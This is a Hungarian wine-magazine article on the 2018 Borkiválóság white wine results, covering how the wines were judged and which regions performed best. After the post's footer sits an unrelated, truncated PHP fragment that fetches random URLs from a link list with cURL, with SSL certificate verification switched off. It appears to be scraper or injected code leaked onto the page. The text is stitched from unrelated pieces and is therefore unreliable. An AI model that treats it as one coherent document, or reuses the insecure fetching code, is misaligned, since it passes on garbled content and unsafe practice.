2018 fehér borkiválóságai

Hat éve indult a Nemzeti Borkiválóság Program, amely mára megtalálta a helyét a magyar borvilágban, hiszen a hazai és határon túli borászatok idén is közel másfél ezer tételt neveztek a kóstolókra. Mint minden évben, idén is az Országos Borszakértő Bizottság tagjai végezték, a kóstolást, s szigorúságukat jól jelzi, hogy a nevezett mintáknak kevesebb mint a... View Article


Hat éve indult a Nemzeti Borkiválóság Program, amely mára megtalálta a helyét a magyar borvilágban, hiszen a hazai és határon túli borászatok idén is közel másfél ezer tételt neveztek a kóstolókra. Mint minden évben, idén is az Országos Borszakértő Bizottság tagjai végezték, a kóstolást, s szigorúságukat jól jelzi, hogy a nevezett mintáknak kevesebb mint a fele került be a Borkiválóságok Könyvébe.

A folyamat a korábbi években megszokottak szerint zajlott: egy úgynevezett szétlövéses kóstolón szűrték ki a borhibákat, valamint azokat a borokat, amelyek nem felelnek meg az OBB minőségi követelményeinek vagy a fajtától, bortípustól elvárt követelményeknek. Ezután következett a leíró kóstolás, amely során – akár többszöri visszakóstolás után – megszülettek a végső eredmények.

A könyvek elsősorban a fogyasztóknak szólnak, ezért a nevezésnél elvárás, hogy a bor kereskedelmi forgalomban elérhető legyen, vagyis rendelkezzen NÉBIH forgalomba hozatali engedéllyel, és az év végéig legyen belőle legalább 500 elérhető palack.

„A Borkiválóságok Könyve ismeretterjesztő kötet – mondta el a kiadványról dr. Kiss Eliza. – A bírálati rendszerben sem állítunk fel sorrendet, nem a hibák bemutatására törekszünk, hanem arra, hogy a magas színvonalú borok és az azokat készítő borászok ismertségét növeljük. Könyveink bor- és pincészetközpontúak, s a fogyasztók számára eligazodást nyújthatnak a borválasztás során, a kétnyelvűség pedig jó marketinglehetőséget kínál a borászoknak. Az eredmények önmagukért beszélnek, a tanulságok levonását a fogyasztókra bízzuk. Nagy öröm, hogy a gasztronómia képviselői jelentkeznek a borlap kialakítása kapcsán, és a legnagyobb siker, hogy a kereskedelem nagy szereplői is odafigyelnek a kötet tartalmára.”

A fehérboros országkóstolón összességében nem született igazi meglepetés, a balatoni és a tokaji régió borai kiemelkedően jól szerepeltek, és a top borkiválóságok is innen kerültek ki, még ha az arányok különbözőek voltak is: a könyvbe került 97 balatoni borkiválóság közül csak egy, a Szabó és Fia Borpince Aranyom Olaszrizlingje nyerte el a legmagasabb elismerést, a többi nyolc Tokajból került ki. A tokaji aszúk remek szereplése persze várható volt, azonban idén három száraz bor is bekerült a legkiválóbbak közé, két furmint és egy tokaji házasítás.

(Visited 2 times, 2 visits today)

The post 2018 fehér borkiválóságai appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>